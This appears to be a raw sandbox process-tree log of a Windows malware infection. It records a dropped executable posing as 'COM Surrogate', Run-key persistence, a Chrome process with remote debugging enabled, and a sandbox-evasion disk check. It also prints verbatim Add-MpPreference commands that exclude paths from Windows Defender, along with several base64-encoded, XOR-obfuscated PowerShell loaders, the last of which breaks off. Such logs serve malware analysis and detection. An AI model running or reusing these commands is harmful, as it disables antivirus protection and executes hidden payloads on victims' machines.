-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4984 /prefetch:85⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5148 /prefetch:85⤵PID:4828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5160,i,17142177504085539574,731248067142979612,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4664 /prefetch:25⤵
- Uses browser remote debugging
PID:4116
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd"3⤵
- System Location Discovery: System Language Discovery
PID:6572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:7360 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10127931121\skf7iF4.cmd" sgcCUaUFtA5⤵
- System Location Discovery: System Language Discovery
PID:6060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Windows\SysWOW64\findstr.exe"C:\Windows\system32\findstr.exe" /i WDS100T2B0A7⤵
- System Location Discovery: System Language Discovery
PID:7036
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe"C:\Users\Admin\AppData\Local\Temp\10127940101\PQkVDtx.exe"3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Enumerates system info in registry
PID:6796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:216
-
-
C:\Program Files\runtime\COM Surrogate.exe"C:\Program Files\runtime\COM Surrogate.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
PID:3892 -
C:\Windows\system32\net.exe"net" session5⤵PID:1136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session6⤵PID:6364
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand JAB5AHAAdgBuAHkAawBjAHMAPQAnAFAAMwBRADAASwBTAEkASgBaAEIAawBFAEEAaABzAFkATQAzAFUAdwBPAHkASQBlAGQAeABvAHoAZQBUAFUAQwBDAFMAawBvAEwAaABzAHcAVABSADQAWQBDAFcAQQBzAEMAUwBvAEMAYwBDAE0AdwBZAHgAZwAxAEQAeQBrAGUAQwBYAFEAMwBKAGcAcwBlAEIAQwBrAHoAZQBHAEEAYQBNAHgAQgBUAEsAZwBnAGkAYwB3AFkATABDAFcAQQBnAEMAUQBFAGsATwBCAHMAdwBiAHcARQB5AEoAdwBjAGIATQAzAFUAegBKAGcAMAB5AFkAMQBrAEkAZQBDAGwAZgBDAFgAVQBLAE4AeQBNAEwAZAB3AFUAMQBEAFQAWQBKAEkARAA0AEMAQgBRADQATABUAFQAcwB5AGUAQQBjAFgAQwBYAFkAZQBBAHgAcwBnAEIAQgAwAHoASQB6AEkAQQBJAEQANABuAE4AUgBjAEsAWQB4AFEASQBJAHgATQA5AEQAaABCAFQAQQB5AEkAZQBkAEIAawBIAGUARAAwAGIATQBBAEIAZgBjAGgAUgBVAFoAMQBnAHoARABRAFEASgBPAFEAQQBLAEsAaABzAGcAWQB4AGcAPQAnADsAJAByAHEAcwBxAGMAZwBnAHoAPQAnAGoARwBmAEEAQQBnADUAbQBRAEoAUQBuACcAOwAkAGwAdQBmAG4APQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAeQBwAHYAbgB5AGsAYwBzACkAOwAkAGEAawBvAHkAaABpAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAGwAdQBmAG4ALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAbAB1AGYAbgBbACQAaQBdAC0AYgB4AG8AcgBbAGIAeQB0AGUAXQAkAHIAcQBzAHEAYwBnAGcAegBbACQAaQAlACQAcgBxAHMAcQBjAGcAZwB6AC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAawBvAHkAaABpACkAKQB8AGkAZQB4AA==5⤵PID:5956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Command and Scripting Interpreter: PowerShell
PID:436
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand JAB5AHAAegBxAD0AJwBZAFYAZwBRAFAAeQAwAFkAQgB6AGMAWABaAGoASQBPAGIAVgBrAFUATABTADAAUABGAEQAUQBnAEgAUgB3AFUAVgB3AFUATQBPAEIAUQBoAEwAagBBAEwAYgBVAGsANgBWAHcAWQBtAFoAaQB3AGgAQQBEAFkAbQBhAHcAQQBJAFYAMQBnAFQATQBBAFEAUABaAHcAYwBnAEgARQBrAE0AYgBUAHgAMwBQAEEAYwB6AEUAQwBnAFkAYgBVAGsAMgBWAHkAMABBAEwAaABRAGgARABDADgAaABRAHkANABOAGIAVgBrAFgATQBBAEkAagBBAEgAYwBiAEgAQQBCAEoAVgAxAGsAdQBJAFMAdwBhAEYAQwBzAG0AYQBSADgAZgBmAGgASQBtAEUAdwBFAGEATABoAFUAaABIAEMANABCAFYAMQBvADYARgBSAFEAeABaAHoATQBnAFEAZwBBADYAVgB5AE0AQQBFAGgAYwB1AEIAQwBzAGEAYQB3AEEATwBiAFYAawBFAEoAQgBZAHcARgBDAHMAYgBIAEEAdwBRAGIAbABrAFUATABRAFEAUABOAFMAMABMAGIAVQBrAHYAYgBqAE0ASQBQAGcAYwB3AEgASABJAGcAUgBUADQAQwBmAFMAaAB6AEQAeQA4AGgAWQB5AGcAZwBIAFIAdwBzAFUAQwBNAHUASgBCAFEAbABGAEEAbwBqAGUAUwBvAFQAYgBqAHgAMgBhAGcAPQA9ACcAOwAkAHoAZABmAGoAbABiAHMAPQAnADQAawBCAFcATgB2AFYAQwBCAC4AeAB4ACcAOwAkAGkAYgBkAHAAdwBoAHQAdgA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB5AHAAegBxACkAOwAkAHEAcQBrAHcAcQB4AD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAGkAYgBkAHAAdwBoAHQAdgAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABpAGIAZABwAHcAaAB0AHYAWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJAB6AGQAZgBqAGwAYgBzAFsAJABpACUAJAB6AGQAZgBqAGwAYgBzAC4ATABlAG4AZwB0AGgAXQB9ACkAKQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHEAcQBrAHcAcQB4ACkAKQB8AGkAZQB4AA==5⤵PID:4676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Packages'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4800
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand JABsAHUAYQBoAHUAYwBlAGwAPQAnAE8AaABVAHYAUQBoAFEAdgBKAFEAUQBQAEYAQwBkAFUATwBSAFoASgBGAFMAQgB6AEgAdwBBAE4AYwBDAGQAQwBFAGcARgBNAEoAaQAwAFYASAB3AFEATgBMAGgAawBlAEYAUQBGAE0ASQB4AFEAdgBQAFUAQQAzAGMAUgBsAFoASwBRAFUATwBCAHkARgB3AFAAVQBBADAAQgBFAHcAZABFADIASQBWAEcAUwAwAFYAWgBBAFUAUABHAHkAYwBiAEsAQQBZAFcAUgBDAFYAdwBCAHcAVQAvAGMAQwBOAFgARQB6ADgAdgBCAHgATQBCAE4AawBVAGkASwBFAEIARwBFAGcAVQBzAFIAVABnADcAQQB3AEEAMABjAEIARQBhAEUAUQBVAG8ARgBTAGMAUgBFADMAMAAwAEcAeQBSAGEASgBXAEEAMwBIAFMAMABWAEEAdwBRAE0AQgBDAE4ARgBKAGgAVQAvAEMAQgBZADcARQB3ADAAbgBCAFQAdABDAEUAaABVAHYARwBCAE0AQgBZAEcAVQAzAEwAZwBWAEMASwBXAEUAbwBGAFQAcwBYAEIAdwBFAE4AQgBEAE4AYgBLAGgAUQA3AEMAeABWAHgARQAxAGsATgBMAFMAYwBiAE8AUgBRAHIARwBoAFIAdwBKAFcAUQAzAEcAeQBkAEIATwBSAEYASQBKAEIAVQB2AFAAVQAwAEsARgBDAEEAWgBQAHkAcwByAFEAeABNAGEASQBWADQAMwBPAGoAUQBYAE8AUgBkAE0ASABoAE0ANwBZAEcAVQAzAEwAZwBWAEMASwBXAEUAbwBGAFMASgB4AFAAVQA4AEsAQgBDAE4AYQBQAEQANAB6AEcAaABVAHYAQQAwAE0ATQBGAHcAWQBaAE8AaABWAEkASAB4AFEAdgBHAHcARQBMAEIAQwBSAEoASQBBAEUANABHAFIAVQBzAEIAMABZAE0AQgB3AFkAWgBPAGgAVQBWAFEAeABNAGEAQwBGAEkAKwBFAEQAUgBGAEUAagB3AHYAQQBSAFUARwBJAGcASQBrAEIAQQAxAFcARQAyAEEASgBHAHoANABHAFkAVgBJAGsAQgBFAEEAZgBFAGgAVQBPAFIAVABoAHgATgBWAG8AUABGAEEAMQBDAE8AUgBFAGUARwBSAEkAVgBOAFEAWQBMAEIAQgBsAEYAUABEAGsAMwBCAEIATQBWAFoAQQBVAG4AQQBFAFIAQQBGAEIARQA0AEIAVAA0AEIAWQBGADAATQBMAGkAUgBKAFAAQQBWAE0AQgBCAE0AQgBFAEYANABNAEYAQwA5AFgASwBUAHcAUgBSAGkAMABCAE8AbABJAEwATwBRAFoARgBFAFEAbwB2AFEAeABNAHIARQBBAHcAbgBBAEMAYwBiAEsAbQBFAGQAUgBoAFkAVgBBADEAYwBrAEMAeQBNAGYARgBUADgAcgBHAEQAcwBwAFoARgBrAEwAQwB5AFIAQgBQAFIARQBPAEYAVAAwAEsAUABWAHMASwBjAEIAMQBlAEsAaABGAE0ATgBoAFYAeABCADAAQQBLAEEAQgBsAEsAUAB5AGcASwBHAFIAWQBzAEYAMABZAEwAQwB6AHQAWQBGAFQAcwA0AFMAegA0AEgATgBWAGsASwBBAEUAUgA2AEsAVwBBAFIASABpADAASwBCADAAWQAwAEYAQwBkADcASwBRAG8AMwBBAEQANABCAFkARwBBADMARwB6AHQAYwBKAFIAVQAvAFEAaABZAEIARQBGADQAUABHAHkATQBmAEYARABnAEsAUgBSAFkAVgBDAEYASQBsAEEAQwBkAGYARQB3AFUAQgBSAGgAUgB3AGEAQQBNAGkASwBEAHQAWQBGAEEAVgBNAFEAagA0AEIAWQBGAHMASwBBAEQAUgBaAE8AdwBFADcAUgBUAGcANwBBADAARQAwAEwAVAA5AEgARgBSAG8AUgBHAFQANABHAFkAVgBJAGsAQgBBAFYAVwBFAGgAbwBSAEMAQgBWAHgASQBWAGMAawBDAHkATQBmAEYAVAA4AHIARwBEAHMAcABaAEYAawBMAEMAeQBSAEIAUABSAEUATwBGAFQAMABGAEkAVQAwAE0AQwB4ADEAVQBFAG0ARQBXAEIAeQBaAHcAYQBBAFEATQBMAFMAUgBlAEsAQQBZAEsAUgBUADAARgBLAFUAMABOAGMAUQBWAEgATwBSAFoASgBGAFIAWQBWAEMARgBJAGwAQQBDAGQAYQBLAGoAdwB6AEcAeABJAEsATwBWADQAaQBLAEMAZABDAEUAMgBBADMAQwB4AFkAYQBFAHcAVQBQAEYARQB4AGIATwB3AEUANwBSAFQANABCAEEAMABFADAATABUADkASABGAFIAbwBSAEcAVABzAHAAQQAxAGsATgBjAFQAdABYAEUAUQBvADcAUQBoAFkAVgBhAEUAQQBuAEMAMABWAEoASwBnAFUAQgBDAEMAMABSAEUAdwBJAG4AQQBCAE4ASABIAHgAcwA0AEgARAA0AEsAWQBRAEkAaABjAEUAVgBKAEsAZwBVAEIAQwBDADAAUgBFAHcASQBoAE8AaQBjAGIASwBtAEUAZABSAGgAWQBWAEEARgBJACsARQBEAFIARgBGAFEAVQBkAFEAUgBJAEYAUABWADQAbgBDAHcASgBKAEoAbQBBAFIASABoAFEAdgBCAEUARQA2AGMAVAA5AGYASwBnAFUAMwBRAGoANABLAEkAbABJAGsAQgBVADEASgBQAEEAVgBNAEgAagA0AEIAQQAwAFUASwBHAHkATQBjAE8AUgBwAEoAUgBUAGgAeABZAFEASQBJAEYAdwBGAGUASwBqAHMANABIAFQAMABGAFkARgBnAE4ATABqADgAYQBGAFIAVQBvAEEAagA0AEsASQBnAEkAawBCAEEAVQBhAEsAVwBFAHYARwBoAEkAQgBFAEEAdwBuAEIAawBCAEMARgBDAHQASQBKAGkANQB3AE8AVgBrADAAQwB5AE4AZABLAGcAVQByAEoAeQA0AGEASAAwAGMALwBGAEQAcwBlAEUAUQBWAEEAQgB6ADQAQgBZAEgATQBMAEIAQwBOAEUARgBBAG8AcgBIAGoANABCAE4AWABFAGgATAB3ADEANABFADIAQQB2AEMAeABSAHoASwBYAGMAMABCAEUAUgBlAEUAagA0AEIATQBCAFEASwBFADMAQQAzAEcAeQBkAEcASwBCAGMAQgBCAEMANQB3AEYAMABZADIAQgBUAGQARwBLAFcAQQBOAEcAaQAxAHcAQgAwADgAMgBCAGsAUgBlAEsAVwBFAHoAQgBCAFIAdwBhAEYAZwBLAEEARQBCADAARQBtAEUAdgBDAHkASQBGAE8AVQBNAE0ATABpAE4ASQBQAFcARQBkAEgAaABaAHgAUABWAHcAagBGAHoAUQBhAEsAVAA4AHoAUQBTADAAVQBLAFUATQBOAEMAeQBkAE4ASgB3AFYAQQBRAHgAUQB1AEUAMQBvAE0AYwBVAEIAQwBQAEQAOAB2AFIAaQAwAFIATQBnAEkAaABPAGkAZABHAEUAaABVAHoAUQBoAFkAUgBFAEEAdwBuAEEAQgAxAG0ASwBnAG8AbwBCAGkAVQBGAEYAdwBVADAARQBCADUAYgBJAFEAVQByAEcAUwBVAEYARgB3AEEATgBPAGgASgBXAE8AdwBGAE0ATgB5ADQAYQBBADEAawBpAEsARABOAEYASwBoAGMAUgBCAEIATQBhAEcAMAA4AGwAQgB6AEEAZABPAHcARgBNAE0AQwAwAEYAQQAzAHMAUABGAEUAQQBmAEYAQgBVAHYAQwBEAHcARwBIAEUAOABsAEYAdwBZAFoATwBoAFUAVgBIAEIASQB2AEcAMAB3AFAATABrADEASgBJAEEARQA3AFAAUwAwAGEATQBrAEUANwBjAFQAdABCAEsAZwBVAHIAUQB4AFUARgBCADEANAA0AEIARABOAFUARQBXAE0AcgBDAHgAWQBWAE4AVgBzADAARwB6AHgASgBQAEEAYwByAEcAaABZAFYASwBRAEEAbgBBAEUAUgBzAEYAQgBFADQARwBTADQAVgBLAFYAdwBLAEIAQgA0AFoAUAB5AHMAcgBIAGgATQBLAEUAMAAwADMARQBEAFEAWABPAFIAZABNAEgAaABNADcAWQBHAEUAMwBjAFIAMQBDAEsAaABvAHYAQQBTADAAVgBBADIAQQAzAEcAegB0AGMASgBSAG8AegBBAGgAVQB2AEgAMABVAE4AQgBEAE4AZABPAFIARgBJAEoAQgBSAHcAQgAwAHcAOQBGAEMAUgBKAE8AaABVAHYAUQBoAFEAdgBKAFEAUQBQAEYAQwBkAFUATwBSAEYASQBQAHgAVgB3AE4AVQBNAE0ATAB5AGMAYgBFAHgAVQBzAEYAUwBRAFYAWgBBAFUAMABHAHoAOQBHAEsAVwBFAHIAQQBoAE0AdgBCAEYASQBpAEYAVAA4AGYARQBqAGsAQgBIAGgATQB2AEIAMABZAG4AQgBoADEAZQBLAG0AQQBSAEgAaABSAHgAQQBBAEkAaABPAGkAYwBhAEYAUQBvAGoAQwBoAFEAUgBFAEEAdwBuAEIAawBCAEMARgBDAHQASQBKAGkANQB3AE8AVgBrADAAQwB5AE4AZABLAGcAVQByAEoAeQA0AGEASAAwAGMANwBjAFMATQBlAEYAQgBVAFYAQgB5ADEAeABIADIARQAwAEcAeQBSAEoAUABBAGMALwBBAFIAVQBGAGEAQQBZADcAYwBDAGQARwBFAHoAdwByAE8AQwAwAHAAYQBFAEEALwBMAGoATQBlAEYAQgBVAHYAQwB4AFkAVgBCADAAOABuAEEARQBSAHIARQBtAEIATQBRAGkASgB4AEEAMABNAE4AQgBoAGwARABJAG0AQgBBAEEAaABVAHYATgBXAFUATQBLAEQAOQBHAEYAQgBvAHIASABoAFEAdgBQAFYAawBOAE8AagBSAGEASgBXAEUAcgBHAGgAUQBzAEEAMgAwAFAAQgBDAE4AYgBJAFEAbwBqAEcAaABZAFYASwBWADAAMwBMAGcAMQBDAE8AUgBGAEkATwB4AFkAVgBBADEANAAwAEYARQBFAFoAUAB5AHMAcgBSAGgASQBhAEMAMAAwAE4ARQBFAEIAbwBGAFIAVQB2AEcAQgBNAGEAQQAwAFUATQBjAFUAQgA3AEUAUQBWAEkASABpAE0ARgBQAFUARQBQAEcAeQBSAEoASQBBAEUANABIAEMASQBFAEEARQBJADcATwBoAFkAWgBQAHkAcwByAFIAaABJAGEAQwAwADAATgBFAEUAQgBzAEUAaABVAEIAQgBCAE4AeQBPAFYAMABOAEwAaQBkADcASwBnAG8AegBCAGgAWQBWAFoARgAwAEsAQgBDAEIASgBJAEEARQA0AEcAUwAwAHYARgAwAFkATgBjAFMAQQBaAFAAeQBzAHIAUgBoAEkAYQBDADAAMABOAEUARQBCADkASwBnAG8AMwBRAGkANABhAEcAdwBVADkARgBFAEEAZQBLAGcAbwB6AFEAQwA0AFYASgBsAEkAKwBFAEQAUgBBAEoAUgBRAG8AQwBEAG8ASABZAFYAcwBoAE8AUQBaAEYARgBSAG8AVgBRAEIAUQBhAEYARQBBADcATABpAE4AVQBGAEIAVQAvAEMAeABNAEgASAAwAE0ASwBGAEUAQQBlAE8AUgBaAEoARgBUAGsARwBOAGcASQBoAE8AaQBjAGEARgBRAG8AagBDAGgAUQBSAFoARwBFAEsAQgBEAE4AWABGAEIAUQBkAEgAUwAwAFYAWgBIAGMASwBMAGoATgBlAEUAaABVAC8ARwB4AFUARgBCAEYASQArAEUARABSAEYARgBCAG8AegBRAHkAMABXAEkAZwBJAGsAQwB4ADAAYgBGAEQAdwAvAEMAagBzAHUATgBWADAAUABjAFMATgA3AEUAbQBNAHoAUQB4AFUAcgBFAEEAdwBuAEEAQwBjAGUARQB6AHcAdgBIAGoAZwA0AEkAbAA0AEwAQwB4AGsAYwBFAHcAbwA4AEIAeQBZAFYASwBVAFkATQBjAEIARgByAEsAZwBWAEkARwBoAFUAdgBBADIARQBLAEIARABOAFgARgBCAEUANABTAHoANABCAEEAMQBnADMARgBBADEAVQBLAGcAWQBLAFIAVAAwAEYAQQAxADAATgBCAEUAQQBlAEYAQgBFADQAUwB6ADQAQgBHAEYANABsAEEAQwBkAGEASwBqAHcAegBHAHgASQBLAE8AVgA0AGkATAB5AGQARwBFADIAQQBOAFAAUwA0AFYAWQBGAGsAbABKAGoANQBKAEYAeABFAHcAUgBUAGgAegBHADEAawAwAGMAUgBsAFUARgBCAFUAdgBDAHoAcwBVAEgAMQA4AFAAQgBDAE4ARgBGAEEAVQBCAEgAaQAwAEUAQQAxADAATgBjAFEAWgBKAFAAQQBjAC8ARwBCAE0ARgBQAFUATQBNAEsAagBSAEYARQBUAHcAUgBHAEIATQBWAEYAdwBFAG4AQQBFAFIANwBFAHoAOABWAEgAQwAxAHcAQgAwAHcAbgBBAEMAZABlAEsAbQBFAEoARwB4AFEAdgBJAFUATQBuAEEARQBSAC8ARQB6ADgAVgBCAHkANQB3AFAAVQBJADMARgBBAEoASgBPAGgAVQB2AFEAaABRAEsARgAxADAAbgBBAEUAUgA2AEsAZwBvAHIAUQBoAFkAVgBaAEYAcwBOAE8AagBSAEYARgBSAG8AVgBRAEIAUQBhAEYARgBJAGkARgBTAGQARwBFADIAQQBOAFAAUwA0AFYAWQBGAGsAbgBBAEMAZABGAEsAUQBvADcAQgB4AE0ASwBBAEYASQBpAEYAUwBkAEcARQAyAEEATgBJAHkANABhAEEAMQBvAG4AQQBDAGQAZQBGAEEAbwB2AFEARAA0AEIAWQBIAEEAMABHAHoAdABFAEUAegA4AFYAQgBSAE0ARgBQAFUATQBNAEsAagBSAEYARQBoAG8ALwBDAEIAWQB2AEcARgBJAGkARgBpADkAWQBFAHoAOAAzAEgAagBnADQASgBRAHcAPQAnADsAJAB4AHgAbgB2AD0AJwBwAFIAeQByAHcAQgBRADUAbgBDAHUALgAnADsAJABpAHkAegBmAGcAcQA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABsAHUAYQBoAHUAYwBlAGwAKQA7ACQAZwByAGwAdABpAHEAZABiAD0AKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkACgAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAGkAeQB6AGYAZwBxAC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGkAeQB6AGYAZwBxAFsAJABpAF0ALQBiAHgAbwByAFsAYgB5AHQAZQBdACQAeAB4AG4AdgBbACQAaQAlACQAeAB4AG4AdgAuAEwAZQBuAGcAdABoAF0AfQApACkAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAHIAbAB0AGkAcQBkAGIAKQApAHwAaQBlAHgA5⤵PID:3060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -EncodedCommand $ f l n l n = ' D 3 4 W M T g 9 I T w Y G Q x o D H A w H T w 9 J W M Y J 3 0 k E A Q S I z 0 9 I S M m O C Y k E H 4 O O T s I J S M h N w s i C V o g O T s I O S U m Q w M b H 3 E S P D 0 i B 2 M n J n 1 n C l 0 g J T 0 g J W I h H g c 9 J 1 g V J h I 2 X h w b J 3 w 9 C k w 3 I j 0 t O T s j O B Q 2 F W U G A Q M 9 O i c X Q g M + H 2 E W e D s i P T g U N w s r J E 8 G c R A j J T 8 g N x s 7 I X V 1 G Q A I G z 8 b Q x w 2 C W M S f T o i L S Y Y N g 8 o J w U G J T o L O W Y L N h 8 5 J g Q w G A A 9 O T w L M 3 w H J 1 s o M T 0 y P m Q N C R 8 5 J 1 s 8 M w M M K m o L N X g 9 I U 9 1 G Q A I G z 8 b Q x w 2 E A U o M z 0 i P S c O H A c 5 J 1 s W P z s x G G Q I O A t h H 2 F x e D p W A D Q S I w w 6 J 1 g S O j s h G G Q I O C U h J g U O I A N W O j Q S I w w 6 J 1 g S O j s h G G Q I N x s l I Q U W I A A c K m o L M x 8 k I W E 8 O h Y f H 2 A j N y E i H 2 U F J h M t O W M b J y V j C V 0 K P z 0 y X m M L M 3 w / I X U F P h A m W j s g H R w 2 C W F x P z 0 m K j g h K B 8 9 J 1 g S M z w 2 A D Q n C j 4 6 I H E o M z o I I T 0 m M w x o D H U W e T 0 i L T w m H D 4 6 H G F x O j p X M i Y W H R t l I X U j P h U m K j g m O B 8 5 J H 4 d P A h X U m I g H h w h H W I 3 f h M t M W c h J 3 Q g D H J 0 L g t X P W M O J g M 7 J H E S I j 0 y E z 8 Y N h 8 5 J g Q 3 L h U z O T s h Q j k A H G 4 W J h A m O W c j K A M o H F s g e R Y f H y M Y G Q w + D 3 4 e f T o y U i I O G w M n I W F x e R A m W j 0 m M w w m D m U G f h Y c O S s m N x s k I W 4 K f B A h W z Q I O B d l J m F 9 O A 4 c O T s g H T U r H 1 9 x B g M 9 A 2 M J N A w i D H U W e z w t L S U j G X g V J w U S P D 0 m B z c N C j 4 6 H 2 F 1 e j 0 i I T k L N H 0 2 J G E d L h I m O S s m N x s k I W 4 K f B U O O T 8 h Q g M o J G 4 G e T g y U i Y J I w 9 m D H U W M T 0 i P S Y m K A N k C V 0 W J T p X J S o j K A 9 h J G F 9 P B A t W z Q Y J z U r H 2 U G f h A m D T o t O Q w / D H 5 0 f j 8 2 K T 8 g O A M 9 D H 4 3 f h M t O W M b J y V j D H J 0 L h M t O W M b J y V j D H 4 z L g 9 X A z 8 h H R g l E Q Q O O A M y J W M L O D 4 2 D 3 B 8 L h U y X j 8 L M x 9 l J G 4 K M A A I D 2 M L O H 1 m I 2 I w c B Z X B z 4 L M y o 6 J m 4 W J T s L P S k n I y Y 2 I E w 3 I j s y H z 0 g Q y E p D H J 0 L g 0 I P W A O J g M 7 J H E S I j 0 y E z 8 Y N h 8 5 J g Q w C w B W O S M g Q n k 2 C W M S f Q M y J W I m N x g 2 D w Y J f w E j P S k Y K A c r H X M C I j s y B y Y a N Q s m J n M W I T 0 i L T A W N 3 Q 7 H G E 8 K g w i L T k j Q g s / H 2 4 K K g 0 y B z k h H X Q r J w Q e e R U J A z o g Q y U F J n E S J Q B X A w Y g Q R 8 9 I H 4 W G T 0 I P S o g N w t k H U w o e g M y H 2 Y b G g M 5 C n E O I D 1 X P T A Y N w t h H X A s I D t W A w c h N x s 9 H A Q s H D t U O T 8 n O B 8 B I V s S M D s i L W Y O H R t l H 2 U n f h Y c O T w h Q i E 7 I X U F c B A g X j 8 m C X w F H A Q s J Q M t P S A Y J x 8 E H G 4 K O w 8 t I S M Y Q i k 9 J l 8 F P Q g 9 O R 4 g Q i k n J 1 w 3 f h M i A y k j J w N h C V 0 W J T s i L W Y L N H 0 2 D w c G H B Q f K Q c I C j 5 m D 3 E W I z w y X i I L N H 0 2 E V s S e h U z J T k j N x s 6 I W E 8 J Q M j O T s h Q j k E J l s o J w N X P S o L M 3 w T I X A K e Q A 9 I W M m K A x m C k 8 W I g B W B y Y j G X g U H 2 E 8 I T w 2 K m o L M y k A E 3 I C B x M f G G Q I N w t k H 2 E O f T w 9 P j Q S I w 8 e H 2 4 n P Q x X J T w Y J x 9 g J 3 E S I g 8 i L S k j Q Q 8 o J G F x I z g 9 K T s g M w w l E 2 4 K J T o O B z g L M x 9 h J m E o M D g i M j Q O J T U n H w R 9 P A 8 t B y Q Y I w 8 b J 1 g W J T o I L T k m N y F j H 2 U F P Q w L P S Y W N x t j H 2 E z L g o i B z 0 j N x s r I X I 3 f h M i A z k Y N y E l I H U F c B A g X j 8 m C X w F H A Q s J Q M t P S A Y J x 8 E H G 4 K O w x X P W M m N y E k H w U K H Q M 9 O j Q O J Q s i J 3 F 9 e g x W O T s h H h 8 b H 1 1 9 P A g I L W M m N x s o J G E S M x A m W h Y g Q